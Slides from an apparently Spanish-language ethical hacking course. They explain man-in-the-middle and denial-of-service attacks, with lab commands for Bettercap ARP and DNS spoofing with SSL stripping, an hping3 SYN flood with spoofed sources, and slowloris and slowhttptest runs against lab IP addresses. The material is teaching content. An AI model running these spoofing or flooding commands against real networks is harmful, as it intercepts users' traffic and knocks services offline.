Curso Ethical

Hacking
MitM?
El concepto de un ataque MiTM es muy sencillo.
Este método sólo necesita que el atacante se sitúe
entre las dos partes que intentan comunicarse;
interceptando los mensajes enviados e imitando al
menos a una de ellas. El atacante se sitúa entre el
objetivo y la fuente pasando totalmente
desapercibido para poder alcanzar con éxito la
meta.
Bettercap
Bettercap es un framework potente, fácilmente
extensible y portátil escrito en Go que tiene como
objetivo ofrecer una solución todo en uno fácil de
usar con todas las funciones que puedan necesitar
para realizar reconocimientos y ataques Redes
WiFi, dispositivos Bluetooth Low Energy,
dispositivos HID inalámbricos y redes IPv4 / IPv6.
Instalación

sudo apt install golang git libpcap libusb

Modulos - ARP

Este módulo sigue falsificando hosts

seleccionados en la red utilizando paquetes ARP
diseñados para realizar un ataque MITM.
Modulos - DNS

Responde a consultas de DNS con respuestas

falsas.
Lab MitM

sudo bettercap
Lab MitM - ARP Spoofing

net.probe on
set arp.spoof.targets <target>
set net.sniff.verbose true
set http.proxy.sslstrip true
net.sniff on
Lab MitM - DNS Spoofing

set dns.spoof.address <target>

set dns.spoof.domains
testphp.vulnweb.com,vulnweb.com
set dns.spoof.all true
dns.spoof on
DoS y DDoS

https://www.digitalattackmap.com/
https://cybermap.kaspersky.com/
Un ataque de denegación del servicio -también
conocido como ataque DoS (Denial-of-service
attack)- es aquel que busca privar a los usuarios de
acceso a su red o equipo. Una evolución de esta
amenaza son los ataques de negación de servicio
distribuido (DDoS) que se provocan al generar
grandes cantidades de información desde varios
puntos de forma voluntaria, para que el usuario o la
organización se vean privados de un recurso.
Usualmente orquestados a través de redes de bots, este tipo de ataques puede
provocar graves daños. A veces se valen de los múltiples aparatos conectados al
Internet de las Cosas (IoT) para que envíen a la vez millones de datos inservibles a
los servidores de la víctima. Así, colapsan el ancho de banda de información que
las empresas pueden enviar o recibir y consiguen que sus ordenadores no puedan
aceptar más solicitudes de datos.

Los ataques de denegación de servicio son una de las amenazas más potentes a
las que se enfrentan las empresas, ya que los hackers pueden utilizan el colapso
de servidores como arma para pedir un rescate. Reforzar la seguridad y mejorar la
protección contra las amenazas DoS, mejora considerablemente la disponibilidad
y seguridad del sistema
Ataque de inundación

Es un ataque DoS que envía múltiples solicitudes de conexión a un servidor, pero luego no
responde para completar el handshake.

Por ejemplo, el atacante puede enviar varias solicitudes para conectarse como cliente, pero
cuando el servidor intenta comunicarse de vuelta para verificar la conexión, el atacante se
niega a responder. Después de repetir el proceso innumerables veces, el servidor se ve tan
inundado de solicitudes pendientes que los clientes reales no pueden conectarse, y el
servidor queda ocupado o incluso se bloquea.

Ataque de fragmentación IP

Es un tipo de ataque DoS que entrega paquetes de red alterados que la red receptora no
puede reensamblar. La red se atasca con paquetes voluminosos sin ensamblar, utilizando
todos sus recursos.
Ataque volumétrico
Un ataque volumétrico es un tipo de ataque DDoS utilizado para atacar los recursos de ancho
de banda. Por ejemplo, el atacante utiliza una red de bots para enviar un alto volumen de
paquetes de solicitud a una red, abrumando su ancho de banda con solicitudes de ICMP. Esto
hace que los servicios se ralenticen o incluso cesen por completo.
Ataque basado en aplicaciones
Un ataque basado en aplicaciones es un tipo de ataque DDoS que tiene como objetivo la
Capa 7 del modelo OSI. Un ejemplo es el ataque Slowloris, en el que el atacante envía
solicitudes parciales del Protocolo de Transferencia de Hipertexto (HTTP) pero no las
completa. Las cabeceras HTTP se envían periódicamente para cada solicitud, lo que hace que
los recursos de la red queden atascados.
El atacante continúa el ataque hasta que el servidor no puede realizar nuevas conexiones.
Este tipo de ataque es muy difícil de detectar porque en lugar de enviar paquetes corruptos,
envía paquetes parciales, y utiliza poco o ningún ancho de banda.
Ataque de inundación

hping3 -c 15000 -d 120 -S -w 64 -p 80 --flood --rand-source <ip>

-c: Cantidad de paquetes

-d: Tamaño de los paquetes en bytes

-w: Tamaño de la ventana TCP

-S: Especificamos que son paquetes SYN

-p: Puerto a atacar

--flood: Enviar los paquetes lo más rápido posible

--rand-source: Generar una IP aleatoria

Ataque basado en aplicaciones

git clone https://github.com/gkbrk/slowloris.git

sudo python3 slowloris.py 192.168.126.133 -s 500
Ataque basado en aplicaciones

sudo apt-get install slowhttptest

slowhttptest -c 500 -H -i 10 -r 200 -t GET -u http://192.168.126.133 -x 24 -p 2

-c: Número de conexiones.

-H: Indica al slowhttptest que use el slowloris.

-i: Intervalo entre el envío de datos.

-r: Tasa de conexión por segundos.

-t: Especifica el método HTTP a usar.

-u: Servidor a atacar.

-x: Lee las respuestas de la víctima muy lento.

-p: Intervalo de espera para las respuestas.